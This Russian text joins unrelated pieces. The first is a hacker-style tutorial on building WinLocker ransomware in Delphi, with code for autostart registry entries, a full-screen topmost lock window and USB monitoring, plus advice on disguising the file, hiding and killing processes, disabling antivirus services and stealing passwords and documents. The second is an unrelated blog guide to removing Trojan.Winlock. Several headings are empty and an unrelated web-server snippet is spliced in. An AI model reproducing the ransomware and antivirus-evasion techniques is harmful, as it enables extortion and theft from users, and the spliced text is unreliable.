Шифрование файлов средствами Delphi также осуществляется достаточно просто. Все зависит от выбранного способа шифрования. Можно просто воспользоваться готовыми модулями, которых пруд пруди на torry.net и на других сайтах. Например, мне попался неплохой вариант от одного из разработчиков Delphi. В этом модуле реализованы следующие функции:

//Шифрование файла
function FileEncrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//Расшифровка файла
function FileDecrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//Шифрование текста
function TextEncrypt(const s: string;
Key: TWordTriple): string;
//Расшифровка текста
function TextDecrypt(const s: string;
Key: TWordTriple): string;
//Шифрование "памяти"
function MemoryEncrypt(Src: Pointer; SrcSize:
Cardinal;
Target: Pointer; TargetSize: Cardinal;
Key: TWordTriple): boolean;
//Расшифровка «памяти»
function MemoryDecrypt(Src: Pointer;
SrcSize: Cardinal; Target: Pointer;
TargetSize: Cardinal; Key: TWordTriple): boolean;

Полный текст этих функций, а также примеры их использования ты найдешь на нашем диске.

Фишка №4: размножайся!

Фишка №5: играй в прятки по максимуму

Как показала практика, авторы Winlocker’ов не сильно заботятся о безопасности своих детищ. Защита большинства представителей этой группы вирусов, попадавшихся мне на глаза, сводилась к банальному присвоению неприметного имени файла. Например: system.exe, user32.exe, csrss.exe, eplorer.exe и так далее. Я не думал, что подобные способы еще катят, но как выяснилось, я заблуждался.
Рекомендую тебе не пренебрегать безопасностью, а предусмотреть несколько разных алгоритмов:

1. Давай файлу вируса неприметное имя. Хоть это и примитивное правило, но соблюдать его крайне желательно.
2. Удали вирус из списка процессов. Этого можно добиться, разобравшись с перехватом API функций. Мы уже много раз писали про перехват API. Обязательно перечитай эти статьи!
3. Используй несколько способов автозагрузки.

Фишка №6: убить на старте

Не поленись и напиши процедуру принудительного завершения процессов. Она обязательно поможет тебе уберечь свое детище от злобных антивирусов, которые пользователь будет пытаться запустить. В идеале вообще организовать перехват функций, использующихся для запуска программ, и не допускать, чтобы они нормально работали.

Work complete

Написать WinLocker и срубить на нем несколько сотен баксов - более чем реально. Пользователи по-прежнему не думают о безопасности и при возникновении щепетильной ситуации готовы отправить заветную смс’ку, нежели напрягать свои извилины. Я показал тебе самый примитивный скелет Winlocker’a. В принципе, довести его до боевого состояния - дело нескольких часов. Только нужно ли это делать? Выбор за тобой! Главное не забывай о том, что написание и распространение вирусов - уголовнонаказуемое деяние, за которое можно словить реальный срок. Само собой, исходник полноценного вируса я не дам. Нет, не потому что я жадный. Эти вирусы и так всех достали, поэтому я чертовски не хочу, чтобы после этой статьи их стало еще больше. Вдобавок, мне не хочется читать новости про то, как правоохранительными органами были задержаны очередные создатели ужасных вирусов:).

Самопальный web-сервер

var
_buff: array of char;
_request:string;
_temp: string;
_path: string;
_FileStream: TFileStream;
begin
Recv(_client, _buff, 1024, 0);
_request:=string(_buff);
_path:= GetFilePath (Copy
(_request, 1, pos(#13, _request)));
_path:= ReplaceSlash(_path);
if ((_path = "") or (_path = "\")) Then
_path:= DocumentRoot + "\" + DirectoryIndex;
{ else
if ((_path ="\")) Then
_path:= DocumentRoot + "\" +
DirectoryIndex; }
if (FileExists(_Path)) Then
begin
_FileStream:=
TFileStream.Create(_Path, fmOpenRead);
SendStr(_Client, "HTTP/1.0 200 OK");
SendStr(_Client, "Server: xSrV");
SendStr(_Client, "Content-Length:" +
IntToStr(_FileStream.Size));
SendStr(_Client, "Content-Type: "
+ GetTypeContent(_Path));
SendStr(_Client, "Connection: close");
SendStr(_Client, "");
SendFile(_Client, _FileStream);
_FileStream.Free;
End
//Вырезано

Ограничиваем запуск приложений

С помощью реестра реально определить список одобренных для запуска программ. Если этот список задан, то пользователь не сможет запустить приложения, которых в нем нет. Список одобренных к запуску приложений задается здесь: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\ RistrictRun. Создав этом разделе ключи (тип REG_SZ) для каждой разрешенной программе, тебе нужно будет подняться на один уровень выше и добавить параметр RestrictRun типа dword со значением 1.

Управление компьютером

Много нехороших дел сможет натворить пользователь, если у него имеется доступ к запуску оснастки «Управление компьютером». Полностью отключить оснастку с помощью реестра нельзя, но удалить ссылку на ее запуск из контекстного меню ярлыка «Мой компьютер» - проще пареной репы. Всего лишь требуется создать параметр NoManageMyComputerVerb типа dword со значением 1 в разделе HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.

Вырубаем службы

Используя возможности реестра, ты без проблем сможешь отключить ненужные пользователю службы (например, антивирусы). Полный список установленных в системе служб находится в ветке HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services. Для деактивации службы отредактируй значение ключа start. Например, чтобы установить службе «Тип запуска» значение «вручную», ключу start необходимо присвоить 3. Если желаешь, чтобы твое ПО протянуло во вражеской системе дольше, то советую вести в своем творении базу служб антивирусов. То есть тебе необходимо четко опознавать сервисы антивирусов и менять им тип запуска.

А что еще нам надо?

Типичные функции любого Winlocker’а мы рассмотрели, теперь самое время подумать о том, как улучшить наше детище. Честно говоря, я не понимаю, почему профессиональные вирусописатели не встраивают в подобные вирусы дополнительные полезные функции. Ведь нет никакой гарантии, что юзер дотянется до мобилы и отправит заветную смс’ку на короткий номер, тем самым обогатив автора вируса. Зато всегда есть шанс увести с тачки пользователя полезную информацию: пароли на различные сервисы, документы, записанные skype переговоры и т.д. Мы не будем вводить каких-то ограничений, а проапгрейдим нашу софтину по полной программе. Итак, ниже я описал шесть фишек, которые было бы полезно реализовать в подобном «проекте».

Мониторим флешки

var
disk:DWORD;
begin
case Msg.WParam of
DBT_DEVICEARRIVAL: //Если подключили флешку


begin
//Пытаемся определить букву диска
disk:= PDEV_BROADAST_VOLUME(Msg.LParam" ")^
.dbcv_unitmask;
//Выполняем свой зловредный код
end;
DBT_DEVICEREMOVECOMPLETE: //Если флешку извлекли
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//Флешку отмонтировали
end;

Незакрываемое окно на WINDOWS API

wc.cbSize:=sizeof(wc);
wc.style:=cs_hredraw or cs_vredraw;
wc.lpfnWndProc:=@WindowProc;
wc.cbClsExtra:=0;
wc.cbWndExtra:=0;
wc.hInstance:=HInstance;
wc.hIcon:=LoadIcon(0,idi_application);
wc.hCursor:=LoadCursor(0,idc_arrow);
wc.hbrBackground:=COLOR_BTNFACE+1;
wc.lpszMenuName:=nil;
wc.lpszClassName:=’win_main’;
RegisterClassEx(wc);
leftPos:=20;
topPos:=0;
windowWidth:=Screen.Width;
WindowHeight:=Screen.Height;
MainWnd:=CreateWindowEx(
0,
‘win_main’,
‘test’,
ws_overlappedwindow,
leftPos,
topPos,
windowWidth,
windowHeight,
0,
0,
Hinstance,
nil
);
SetWindowLong(MainWnd, GWL_HWNDPARENT,
GetDesktopWindow);
SetWindowPos(MainWnd, HWND_TOPMOST,
0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);
ShowWindow(MainWnd, CmdShow);
While GetMessage(Mesg,0,0,0) do
begin
TranslateMessage(Mesg);
DispatchMessage(Mesg);
end;

WINAPI для работы с реестром

var
Key: HKey;
begin
//Сюда можешь подставить один из путей
автозагрузки.
RegOpenKey(HKEY_LOCAL_MACHINE,
PChar(‘’), Key);
RegSetValueEx(Key,PChar(paramstr(0)),
0, REG_SZ,
pchar(paramstr(0)),
lstrlen(pchar(paramstr(0)))+1);
RegCloseKey(Key);
end;

«О, вот такая точно была картинка! Даже номер тот же», – почти радостно «узнал» вирус очередной «потерпевший».

Те, кто занимается ремонтом компьютеров, вы когда-нибудь замечали, что иногда при вашем появлении сломавшийся компьютер вдруг начинает работать как ни в чём не бывало? И невольно кто-то смотрит на вас со страхом с уважением или даже шутит.

В этом случае после загрузки Windows никакого вируса не было, а звонили мне два дня назад и всё это время компьютер был выключен. Куда же он делся?

Один из советов по удалению разновидностей вируса Trojan.Winlock , подсказывает: переведите системное время в BIOS на два дня вперёд, если не получится, то на месяц, год… Это не всегда срабатывает, так же как кованые решетки на окна не всегда спасают от грабителей, но вселяют уверенность (у меня ни разу не получалось так избавится от вымогателя), но здесь, кажется, сработало естественным путём.

И всё же удалять новую пакость лучше методами действенными и проверенными. Надо сказать, что существующие сейчас при сайтах антивирусных компаний сервисы деблокираторов уже не всегда помогают, а многочисленные варианты удаления хитро… умных вирусов способны только запутать.

Между тем среди многочисленных советов есть два достаточно простых, но эффективных способа ликвидации многочисленных Trojan.Winlock – вирусов, которые блокируют операционную систему, делая невозможной работу, и требуют при этом отправить некую сумму денег.

Сразу скажу, что варианты не мои, я ими лишь вооружился, но за полезность и профпригодность скажем спасибо worldwar87 .

Переустанавливать Windows – самое последнее дело, ведь можно решить проблему, не теряя времени и без особого риска для данных.

Первое, что надо сделать – перезагрузить компьютер и, нажимая при первоначальной загрузке клавишу F8 (иногда F5), выбрать параметр: Безопасный режим с поддержкой командной строки .

Жмём Enter и рассматриваем ситуацию: первая – Безопасный режим благополучно загрузился без вируса , вторая – он (вирус) никуда не исчез .

В первом случае нам нужно в командной строке набрать команду .

Открыть ветвь реестра, используя путь:

HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> winlogon

Заглядываем в Shell , как на рисунке:

На чистом компьютере вы увидите то, что и должно быть: написано explorer.exe. На зараженном – полный путь до исполняемого файла вируса. Запомните или запишите его, чтобы впоследствии удалить.

Для этого в командной же строке набираем explorer.exe и через «Мой компьютер» добираемся до вируса. Удаляем.

В Shell оставляем только запись explorer.exe

Для ситуации второй, когда вирус не даёт работать в Безопасном режиме, понадобится загрузочный Live-CD с Windows.

Его придется (если нету) скачивать из Интернета. Думаю, что сможете найти – Google вам в помощь.

Потом выбрать Файл ->Импортировать (путь С:/WINDOWS/System32/config/software) открываем и в созданном нами разделе повторяем действия , описанные в первом примере.

После удаления вируса потребуется экспортировать нашу очищенную ветку назад. Для этого выбираем меню Файл ->Экспортировать и обратно в С:/WINDOWS/System32/config/software.

После этого перезагружаем компьютер. Вирус удалён, но просканировать его полностью антивирусом с обновленными базами надо: своеобразный контроль и проверка исполнения, совсем как модули СУП в системе управления предприятием.

Счастливой охоты!